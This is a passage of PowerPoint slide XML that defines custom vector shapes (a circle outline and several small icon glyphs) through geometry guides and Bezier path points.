                <a:gd name="T83" fmla="*/ 391 h 396"/>
                <a:gd name="T84" fmla="*/ 334 w 396"/>
                <a:gd name="T85" fmla="*/ 334 h 396"/>
                <a:gd name="T86" fmla="*/ 390 w 396"/>
                <a:gd name="T87" fmla="*/ 198 h 396"/>
                <a:gd name="T88" fmla="*/ 390 w 396"/>
                <a:gd name="T89" fmla="*/ 198 h 396"/>
                <a:gd name="T90" fmla="*/ 390 w 396"/>
                <a:gd name="T91" fmla="*/ 198 h 396"/>
                <a:gd name="T92" fmla="*/ 390 w 396"/>
                <a:gd name="T93" fmla="*/ 198 h 396"/>
                <a:gd name="T94" fmla="*/ 390 w 396"/>
                <a:gd name="T95" fmla="*/ 198 h 396"/>
                <a:gd name="T96" fmla="*/ 334 w 396"/>
                <a:gd name="T97" fmla="*/ 62 h 396"/>
                <a:gd name="T98" fmla="*/ 198 w 396"/>
                <a:gd name="T99" fmla="*/ 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96" h="396">
                  <a:moveTo>
                    <a:pt x="198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53" y="0"/>
                    <a:pt x="302" y="22"/>
                    <a:pt x="338" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="94"/>
                    <a:pt x="396" y="144"/>
                    <a:pt x="396" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                    <a:pt x="396" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="253"/>
                    <a:pt x="374" y="303"/>
                    <a:pt x="338" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="374"/>
                    <a:pt x="253" y="396"/>
                    <a:pt x="198" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                    <a:pt x="198" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="396"/>
                    <a:pt x="94" y="374"/>
                    <a:pt x="58" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="303"/>
                    <a:pt x="0" y="253"/>
                    <a:pt x="0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144"/>
                    <a:pt x="22" y="94"/>
                    <a:pt x="58" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="22"/>
                    <a:pt x="143" y="0"/>
                    <a:pt x="198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0"/>
                    <a:pt x="198" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                    <a:pt x="198" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="6"/>
                    <a:pt x="97" y="28"/>
                    <a:pt x="62" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="97"/>
                    <a:pt x="6" y="145"/>
                    <a:pt x="6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                    <a:pt x="6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="251"/>
                    <a:pt x="27" y="299"/>
                    <a:pt x="62" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="369"/>
                    <a:pt x="145" y="391"/>
                    <a:pt x="198" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                    <a:pt x="198" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="391"/>
                    <a:pt x="299" y="369"/>
                    <a:pt x="334" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="299"/>
                    <a:pt x="390" y="251"/>
                    <a:pt x="390" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                    <a:pt x="390" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="145"/>
                    <a:pt x="369" y="97"/>
                    <a:pt x="334" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299" y="28"/>
                    <a:pt x="251" y="6"/>
                    <a:pt x="19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$1iḓe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3610756" y="2938459"/>
              <a:ext cx="738931" cy="957066"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168 w 229"/>
                <a:gd name="T1" fmla="*/ 184 h 296"/>
                <a:gd name="T2" fmla="*/ 223 w 229"/>
                <a:gd name="T3" fmla="*/ 184 h 296"/>
                <a:gd name="T4" fmla="*/ 223 w 229"/>
                <a:gd name="T5" fmla="*/ 220 h 296"/>
                <a:gd name="T6" fmla="*/ 185 w 229"/>
                <a:gd name="T7" fmla="*/ 220 h 296"/>
                <a:gd name="T8" fmla="*/ 168 w 229"/>
                <a:gd name="T9" fmla="*/ 204 h 296"/>
                <a:gd name="T10" fmla="*/ 168 w 229"/>
                <a:gd name="T11" fmla="*/ 184 h 296"/>
                <a:gd name="T12" fmla="*/ 226 w 229"/>
                <a:gd name="T13" fmla="*/ 37 h 296"/>
                <a:gd name="T14" fmla="*/ 191 w 229"/>
                <a:gd name="T15" fmla="*/ 0 h 296"/>
                <a:gd name="T16" fmla="*/ 34 w 229"/>
                <a:gd name="T17" fmla="*/ 0 h 296"/>
                <a:gd name="T18" fmla="*/ 0 w 229"/>
                <a:gd name="T19" fmla="*/ 35 h 296"/>
                <a:gd name="T20" fmla="*/ 0 w 229"/>
                <a:gd name="T21" fmla="*/ 248 h 296"/>
                <a:gd name="T22" fmla="*/ 37 w 229"/>
                <a:gd name="T23" fmla="*/ 294 h 296"/>
                <a:gd name="T24" fmla="*/ 120 w 229"/>
                <a:gd name="T25" fmla="*/ 294 h 296"/>
                <a:gd name="T26" fmla="*/ 133 w 229"/>
                <a:gd name="T27" fmla="*/ 278 h 296"/>
                <a:gd name="T28" fmla="*/ 148 w 229"/>
                <a:gd name="T29" fmla="*/ 295 h 296"/>
                <a:gd name="T30" fmla="*/ 191 w 229"/>
                <a:gd name="T31" fmla="*/ 295 h 296"/>
                <a:gd name="T32" fmla="*/ 229 w 229"/>
                <a:gd name="T33" fmla="*/ 257 h 296"/>
                <a:gd name="T34" fmla="*/ 162 w 229"/>
                <a:gd name="T35" fmla="*/ 257 h 296"/>
                <a:gd name="T36" fmla="*/ 148 w 229"/>
                <a:gd name="T37" fmla="*/ 238 h 296"/>
                <a:gd name="T38" fmla="*/ 137 w 229"/>
                <a:gd name="T39" fmla="*/ 253 h 296"/>
                <a:gd name="T40" fmla="*/ 125 w 229"/>
                <a:gd name="T41" fmla="*/ 258 h 296"/>
                <a:gd name="T42" fmla="*/ 67 w 229"/>
                <a:gd name="T43" fmla="*/ 258 h 296"/>
                <a:gd name="T44" fmla="*/ 35 w 229"/>
                <a:gd name="T45" fmla="*/ 224 h 296"/>
                <a:gd name="T46" fmla="*/ 35 w 229"/>
                <a:gd name="T47" fmla="*/ 52 h 296"/>
                <a:gd name="T48" fmla="*/ 47 w 229"/>
                <a:gd name="T49" fmla="*/ 37 h 296"/>
                <a:gd name="T50" fmla="*/ 226 w 229"/>
                <a:gd name="T51" fmla="*/ 37 h 296"/>
                <a:gd name="T52" fmla="*/ 168 w 229"/>
                <a:gd name="T53" fmla="*/ 109 h 296"/>
                <a:gd name="T54" fmla="*/ 223 w 229"/>
                <a:gd name="T55" fmla="*/ 109 h 296"/>
                <a:gd name="T56" fmla="*/ 223 w 229"/>
                <a:gd name="T57" fmla="*/ 148 h 296"/>
                <a:gd name="T58" fmla="*/ 168 w 229"/>
                <a:gd name="T59" fmla="*/ 148 h 296"/>
                <a:gd name="T60" fmla="*/ 168 w 229"/>
                <a:gd name="T61" fmla="*/ 109 h 296"/>
                <a:gd name="T62" fmla="*/ 74 w 229"/>
                <a:gd name="T63" fmla="*/ 109 h 296"/>
                <a:gd name="T64" fmla="*/ 132 w 229"/>
                <a:gd name="T65" fmla="*/ 109 h 296"/>
                <a:gd name="T66" fmla="*/ 132 w 229"/>
                <a:gd name="T67" fmla="*/ 148 h 296"/>
                <a:gd name="T68" fmla="*/ 74 w 229"/>
                <a:gd name="T69" fmla="*/ 148 h 296"/>
                <a:gd name="T70" fmla="*/ 74 w 229"/>
                <a:gd name="T71" fmla="*/ 109 h 296"/>
                <a:gd name="T72" fmla="*/ 74 w 229"/>
                <a:gd name="T73" fmla="*/ 184 h 296"/>
                <a:gd name="T74" fmla="*/ 132 w 229"/>
                <a:gd name="T75" fmla="*/ 184 h 296"/>
                <a:gd name="T76" fmla="*/ 132 w 229"/>
                <a:gd name="T77" fmla="*/ 204 h 296"/>
                <a:gd name="T78" fmla="*/ 115 w 229"/>
                <a:gd name="T79" fmla="*/ 220 h 296"/>
                <a:gd name="T80" fmla="*/ 83 w 229"/>
                <a:gd name="T81" fmla="*/ 220 h 296"/>
                <a:gd name="T82" fmla="*/ 74 w 229"/>
                <a:gd name="T83" fmla="*/ 210 h 296"/>
                <a:gd name="T84" fmla="*/ 74 w 229"/>
                <a:gd name="T85" fmla="*/ 18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9" h="296">
                  <a:moveTo>
                    <a:pt x="168" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="184"/>
                    <a:pt x="223" y="184"/>
                    <a:pt x="223" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="220"/>
                    <a:pt x="223" y="220"/>
                    <a:pt x="223" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="220"/>
                    <a:pt x="185" y="220"/>
                    <a:pt x="185" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="220"/>
                    <a:pt x="168" y="213"/>
                    <a:pt x="168" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="184"/>
                    <a:pt x="168" y="184"/>
                    <a:pt x="168" y="184"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="0"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="191" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="0"/>
                    <a:pt x="68" y="0"/>
                    <a:pt x="34" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="204"/>
                    <a:pt x="0" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="292"/>
                    <a:pt x="37" y="294"/>
                    <a:pt x="37" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="294"/>
                    <a:pt x="111" y="296"/>
                    <a:pt x="120" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="292"/>
                    <a:pt x="133" y="278"/>
                    <a:pt x="133" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="294"/>
                    <a:pt x="148" y="295"/>
                    <a:pt x="148" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="295"/>
                    <a:pt x="191" y="295"/>
                    <a:pt x="191" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="257"/>
                    <a:pt x="229" y="257"/>
                    <a:pt x="229" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="257"/>
                    <a:pt x="174" y="259"/>
                    <a:pt x="162" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="255"/>
                    <a:pt x="148" y="238"/>
                    <a:pt x="148" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="238"/>
                    <a:pt x="143" y="248"/>
                    <a:pt x="137" y="253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="258"/>
                    <a:pt x="125" y="258"/>
                    <a:pt x="125" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="258"/>
                    <a:pt x="67" y="258"/>
                    <a:pt x="67" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="35" y="224"/>
                    <a:pt x="35" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="224"/>
                    <a:pt x="35" y="65"/>
                    <a:pt x="35" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="38"/>
                    <a:pt x="47" y="37"/>
                    <a:pt x="47" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="37"/>
                    <a:pt x="226" y="37"/>
                    <a:pt x="226" y="37"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168" y="109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48"/>
                    <a:pt x="223" y="148"/>
                    <a:pt x="223" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="109"/>
                    <a:pt x="168" y="109"/>
                    <a:pt x="168" y="109"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="109"/>
                    <a:pt x="132" y="109"/>
                    <a:pt x="132" y="109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4" y="109"/>
                    <a:pt x="74" y="109"/>
                    <a:pt x="74" y="109"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="184"/>
                    <a:pt x="132" y="184"/>
                    <a:pt x="132" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="204"/>
                    <a:pt x="132" y="204"/>
                    <a:pt x="132" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="213"/>
                    <a:pt x="124" y="220"/>
                    <a:pt x="115" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="220"/>
                    <a:pt x="83" y="220"/>
                    <a:pt x="83" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="220"/>
                    <a:pt x="74" y="215"/>
                    <a:pt x="74" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="1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ŝ1ïḍê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3579399" y="4005955"/>
              <a:ext cx="128154" cy="118611"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 40"/>
                <a:gd name="T1" fmla="*/ 11 h 37"/>
                <a:gd name="T2" fmla="*/ 11 w 40"/>
                <a:gd name="T3" fmla="*/ 6 h 37"/>
                <a:gd name="T4" fmla="*/ 7 w 40"/>
                <a:gd name="T5" fmla="*/ 13 h 37"/>
                <a:gd name="T6" fmla="*/ 17 w 40"/>
                <a:gd name="T7" fmla="*/ 18 h 37"/>
                <a:gd name="T8" fmla="*/ 18 w 40"/>
                <a:gd name="T9" fmla="*/ 16 h 37"/>
                <a:gd name="T10" fmla="*/ 21 w 40"/>
                <a:gd name="T11" fmla="*/ 11 h 37"/>
                <a:gd name="T12" fmla="*/ 36 w 40"/>
                <a:gd name="T13" fmla="*/ 14 h 37"/>
                <a:gd name="T14" fmla="*/ 37 w 40"/>
                <a:gd name="T15" fmla="*/ 15 h 37"/>
                <a:gd name="T16" fmla="*/ 39 w 40"/>
                <a:gd name="T17" fmla="*/ 16 h 37"/>
                <a:gd name="T18" fmla="*/ 40 w 40"/>
                <a:gd name="T19" fmla="*/ 17 h 37"/>
                <a:gd name="T20" fmla="*/ 35 w 40"/>
                <a:gd name="T21" fmla="*/ 25 h 37"/>
                <a:gd name="T22" fmla="*/ 31 w 40"/>
                <a:gd name="T23" fmla="*/ 32 h 37"/>
                <a:gd name="T24" fmla="*/ 31 w 40"/>
                <a:gd name="T25" fmla="*/ 32 h 37"/>
                <a:gd name="T26" fmla="*/ 28 w 40"/>
                <a:gd name="T27" fmla="*/ 31 h 37"/>
                <a:gd name="T28" fmla="*/ 27 w 40"/>
                <a:gd name="T29" fmla="*/ 30 h 37"/>
                <a:gd name="T30" fmla="*/ 28 w 40"/>
                <a:gd name="T31" fmla="*/ 28 h 37"/>
                <a:gd name="T32" fmla="*/ 19 w 40"/>
                <a:gd name="T33" fmla="*/ 24 h 37"/>
                <a:gd name="T34" fmla="*/ 15 w 40"/>
                <a:gd name="T35" fmla="*/ 32 h 37"/>
                <a:gd name="T36" fmla="*/ 12 w 40"/>
                <a:gd name="T37" fmla="*/ 36 h 37"/>
                <a:gd name="T38" fmla="*/ 12 w 40"/>
                <a:gd name="T39" fmla="*/ 36 h 37"/>
                <a:gd name="T40" fmla="*/ 8 w 40"/>
                <a:gd name="T41" fmla="*/ 34 h 37"/>
                <a:gd name="T42" fmla="*/ 8 w 40"/>
                <a:gd name="T43" fmla="*/ 34 h 37"/>
                <a:gd name="T44" fmla="*/ 15 w 40"/>
                <a:gd name="T45" fmla="*/ 22 h 37"/>
                <a:gd name="T46" fmla="*/ 5 w 40"/>
                <a:gd name="T47" fmla="*/ 16 h 37"/>
                <a:gd name="T48" fmla="*/ 5 w 40"/>
                <a:gd name="T49" fmla="*/ 18 h 37"/>
                <a:gd name="T50" fmla="*/ 4 w 40"/>
                <a:gd name="T51" fmla="*/ 19 h 37"/>
                <a:gd name="T52" fmla="*/ 4 w 40"/>
                <a:gd name="T53" fmla="*/ 19 h 37"/>
                <a:gd name="T54" fmla="*/ 2 w 40"/>
                <a:gd name="T55" fmla="*/ 18 h 37"/>
                <a:gd name="T56" fmla="*/ 1 w 40"/>
                <a:gd name="T57" fmla="*/ 17 h 37"/>
                <a:gd name="T58" fmla="*/ 0 w 40"/>
                <a:gd name="T59" fmla="*/ 17 h 37"/>
                <a:gd name="T60" fmla="*/ 1 w 40"/>
                <a:gd name="T61" fmla="*/ 16 h 37"/>
                <a:gd name="T62" fmla="*/ 2 w 40"/>
                <a:gd name="T63" fmla="*/ 14 h 37"/>
                <a:gd name="T64" fmla="*/ 5 w 40"/>
                <a:gd name="T65" fmla="*/ 8 h 37"/>
                <a:gd name="T66" fmla="*/ 9 w 40"/>
                <a:gd name="T67" fmla="*/ 1 h 37"/>
                <a:gd name="T68" fmla="*/ 10 w 40"/>
                <a:gd name="T69" fmla="*/ 0 h 37"/>
                <a:gd name="T70" fmla="*/ 13 w 40"/>
                <a:gd name="T71" fmla="*/ 2 h 37"/>
                <a:gd name="T72" fmla="*/ 23 w 40"/>
                <a:gd name="T73" fmla="*/ 7 h 37"/>
                <a:gd name="T74" fmla="*/ 26 w 40"/>
                <a:gd name="T75" fmla="*/ 2 h 37"/>
                <a:gd name="T76" fmla="*/ 26 w 40"/>
                <a:gd name="T77" fmla="*/ 1 h 37"/>
                <a:gd name="T78" fmla="*/ 26 w 40"/>
                <a:gd name="T79" fmla="*/ 0 h 37"/>
                <a:gd name="T80" fmla="*/ 29 w 40"/>
                <a:gd name="T81" fmla="*/ 2 h 37"/>
                <a:gd name="T82" fmla="*/ 30 w 40"/>
                <a:gd name="T83" fmla="*/ 3 h 37"/>
                <a:gd name="T84" fmla="*/ 30 w 40"/>
                <a:gd name="T85" fmla="*/ 4 h 37"/>
                <a:gd name="T86" fmla="*/ 29 w 40"/>
                <a:gd name="T87" fmla="*/ 5 h 37"/>
                <a:gd name="T88" fmla="*/ 26 w 40"/>
                <a:gd name="T89" fmla="*/ 9 h 37"/>
                <a:gd name="T90" fmla="*/ 36 w 40"/>
                <a:gd name="T91" fmla="*/ 14 h 37"/>
                <a:gd name="T92" fmla="*/ 30 w 40"/>
                <a:gd name="T93" fmla="*/ 25 h 37"/>
                <a:gd name="T94" fmla="*/ 21 w 40"/>
                <a:gd name="T95" fmla="*/ 20 h 37"/>
                <a:gd name="T96" fmla="*/ 22 w 40"/>
                <a:gd name="T97" fmla="*/ 18 h 37"/>
                <a:gd name="T98" fmla="*/ 25 w 40"/>
                <a:gd name="T99" fmla="*/ 13 h 37"/>
                <a:gd name="T100" fmla="*/ 34 w 40"/>
                <a:gd name="T101" fmla="*/ 18 h 37"/>
                <a:gd name="T102" fmla="*/ 30 w 40"/>
                <a:gd name="T103" fmla="*/ 2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" h="37">
                  <a:moveTo>
                    <a:pt x="21" y="11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1" y="11"/>
                    <a:pt x="21" y="11"/>
                    <a:pt x="21" y="11"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="15"/>
                    <a:pt x="37" y="15"/>
                    <a:pt x="37" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="16"/>
                    <a:pt x="39" y="16"/>
                    <a:pt x="39" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="16"/>
                    <a:pt x="40" y="16"/>
                    <a:pt x="40" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="20"/>
                    <a:pt x="36" y="23"/>
                    <a:pt x="35" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="28"/>
                    <a:pt x="33" y="30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8" y="26"/>
                    <a:pt x="16" y="29"/>
                    <a:pt x="15" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="34"/>
                    <a:pt x="13" y="36"/>
                    <a:pt x="12" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="36"/>
                    <a:pt x="12" y="37"/>
                    <a:pt x="12" y="36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8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8"/>
                    <a:pt x="3" y="18"/>
                    <a:pt x="2" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="18"/>
                    <a:pt x="2" y="18"/>
                    <a:pt x="1" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="17"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="1" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="15"/>
                    <a:pt x="1" y="15"/>
                    <a:pt x="2" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="13"/>
                    <a:pt x="3" y="11"/>
                    <a:pt x="5" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="6"/>
                    <a:pt x="8" y="3"/>
                    <a:pt x="9" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="10" y="0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1"/>
                    <a:pt x="28" y="2"/>
                    <a:pt x="29" y="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1" y="3"/>
                    <a:pt x="30" y="4"/>
                    <a:pt x="30" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="4"/>
                    <a:pt x="29" y="4"/>
                    <a:pt x="29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36" y="14"/>
                    <a:pt x="36" y="14"/>
                    <a:pt x="36" y="14"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="20"/>
                    <a:pt x="21" y="20"/>
                    <a:pt x="21" y="20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34" y="18"/>
                    <a:pt x="34" y="18"/>
                    <a:pt x="34" y="18"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3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$ľîḋè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3707553" y="4053672"/>
              <a:ext cx="132244" cy="136334"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 41"/>
                <a:gd name="T1" fmla="*/ 8 h 42"/>
                <a:gd name="T2" fmla="*/ 19 w 41"/>
                <a:gd name="T3" fmla="*/ 19 h 42"/>
                <a:gd name="T4" fmla="*/ 22 w 41"/>
                <a:gd name="T5" fmla="*/ 10 h 42"/>
                <a:gd name="T6" fmla="*/ 37 w 41"/>
                <a:gd name="T7" fmla="*/ 9 h 42"/>
                <a:gd name="T8" fmla="*/ 38 w 41"/>
                <a:gd name="T9" fmla="*/ 10 h 42"/>
                <a:gd name="T10" fmla="*/ 36 w 41"/>
                <a:gd name="T11" fmla="*/ 23 h 42"/>
                <a:gd name="T12" fmla="*/ 40 w 41"/>
                <a:gd name="T13" fmla="*/ 24 h 42"/>
                <a:gd name="T14" fmla="*/ 40 w 41"/>
                <a:gd name="T15" fmla="*/ 27 h 42"/>
                <a:gd name="T16" fmla="*/ 39 w 41"/>
                <a:gd name="T17" fmla="*/ 28 h 42"/>
                <a:gd name="T18" fmla="*/ 25 w 41"/>
                <a:gd name="T19" fmla="*/ 24 h 42"/>
                <a:gd name="T20" fmla="*/ 28 w 41"/>
                <a:gd name="T21" fmla="*/ 31 h 42"/>
                <a:gd name="T22" fmla="*/ 36 w 41"/>
                <a:gd name="T23" fmla="*/ 38 h 42"/>
                <a:gd name="T24" fmla="*/ 38 w 41"/>
                <a:gd name="T25" fmla="*/ 40 h 42"/>
